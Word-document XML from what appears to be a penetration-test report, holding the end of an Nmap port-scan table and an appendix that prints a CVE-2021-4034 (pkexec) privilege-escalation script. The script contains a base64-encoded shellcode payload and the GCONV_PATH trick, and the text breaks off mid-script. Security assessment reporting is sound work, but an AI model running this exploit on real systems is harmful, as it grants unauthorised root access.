              <w:t>42780</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5A21EB0"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592F8158"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430BEF21" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>49881</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3BE19C21"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004FFC7F"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E81E144" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>49953</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27ABAE71"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33415DEF"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179646A4"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52396</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7B20C563"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4ED93ED0"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DBD6653"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53852</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160B6974"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07225C1F"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7F4B89D3"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54597</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FF362CF"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2A967A87"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4C34B839" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>56585</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1D8C4DEF"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25713E9B" w14:textId="77777777" w:rsidTr="006A08E8">
        <w:trPr>
          <w:trHeight w:val="300"/>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9E7696D" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>62049</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6DC47960"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r w:rsidR="006A08E8" w14:paraId="339B78F1" w14:textId="77777777" w:rsidTr="006A08E8">
        <w:trPr>
          <w:trHeight w:val="38"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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47B74FD" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>62992</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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5B8B7" w:themeFill="accent2" w:themeFillTint="66"/>
            <w:tcMar>
              <w:top w:w="30" w:type="dxa"/>
              <w:left w:w="30" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="30" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F43B5A0" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Unknown/Unassigned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FB3DF72" w14:textId="77777777" w:rsidR="007401EF" w:rsidRDefault="007401EF"/>
    <w:p w14:paraId="0B3F4DD8" w14:textId="3F609AAE" w:rsidR="006A08E8" w:rsidRDefault="007401EF" w:rsidP="006A08E8">
      <w:pPr>
        <w:ind w:right="-1260" w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Table</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00577A63">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Port Scan Results</w:t>
      </w:r>
      <w:r w:rsidR="006A08E8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E96C7D9" w14:textId="45E69026" w:rsidR="007401EF" w:rsidRDefault="007401EF" w:rsidP="006A08E8">
      <w:pPr>
        <w:ind w:right="-1260" w:firstLine="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nbn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F467E5" w14:textId="77777777" w:rsidR="007401EF" w:rsidRDefault="007401EF"/>
    <w:p w14:paraId="5935EB21" w14:textId="77777777" w:rsidR="007401EF" w:rsidRDefault="007401EF"/>
    <w:p w14:paraId="44861BE6" w14:textId="77777777" w:rsidR="007401EF" w:rsidRDefault="007401EF"/>
    <w:p w14:paraId="74590233" w14:textId="77777777" w:rsidR="007401EF" w:rsidRDefault="007401EF"/>
    <w:p w14:paraId="339C1F6A" w14:textId="41A4372B" w:rsidR="007401EF" w:rsidRDefault="007401EF" w:rsidP="007401EF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D634008" w14:textId="77777777" w:rsidR="007401EF" w:rsidRDefault="007401EF"/>
    <w:p w14:paraId="4245AF67" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="3114590F" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="1FB46431" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="1AE7E7EA" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="428FA9F1" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="2973C1C3" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="35395D63" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="17B63F33" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="2396D5F7" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="19A28563" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="6536D094" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="4D1E7D56" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="19FB41ED" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="072547D0" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="17EBED30" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
      <w:pPr>
        <w:ind w:right="-1260"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3071B4EB" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
      <w:pPr>
        <w:ind w:right="-1260"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03934138" w14:textId="0C260CAE" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
      <w:pPr>
        <w:ind w:right="-1260"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Table</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Port Scan Results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>of nbn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38481A47" w14:textId="77777777" w:rsidR="00577A63" w:rsidRDefault="00577A63" w:rsidP="006A08E8">
      <w:pPr>
        <w:ind w:right="-1260"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4798C9F7" w14:textId="6AB23755" w:rsidR="00577A63" w:rsidRDefault="00577A63" w:rsidP="00577A63">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc153834535"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">APPENDIX </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Scripts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="0FF44459" w14:textId="1848D778" w:rsidR="00577A63" w:rsidRDefault="005111E1" w:rsidP="005111E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2021-4034</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF7E6F9" w14:textId="780D859F" w:rsidR="005111E1" w:rsidRPr="005111E1" w:rsidRDefault="005111E1" w:rsidP="005111E1">
      <w:r w:rsidRPr="005111E1">
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A665D0E" w14:textId="64C5299B" w:rsidR="005111E1" w:rsidRPr="005111E1" w:rsidRDefault="005111E1" w:rsidP="005111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rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ctypes </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import </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CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ctypes.util </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>find_library</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t>payload = base64.b64decode(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b'''</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU='''</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t>environ = [</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b'exploit'</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A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b'PATH=GCONV_PATH=.'</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A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b'LC_MESSAGES=en_US.UTF-8'</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A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b'XAUTHORITY=../LOL'</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, None</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t>libc = CDLL(find_library(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'c'</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CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="8888C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>open</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6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'payload.so'</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6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'wb'</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f:</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    f.write(payload)</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>os.chmod(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'payload.so'</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6897BB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0o0755</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t>os.mkdir(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'GCONV_PATH=.'</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8888C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>open</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6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'GCONV_PATH=./exploit'</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6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'wb'</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).write(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b''</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t>os.chmod(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
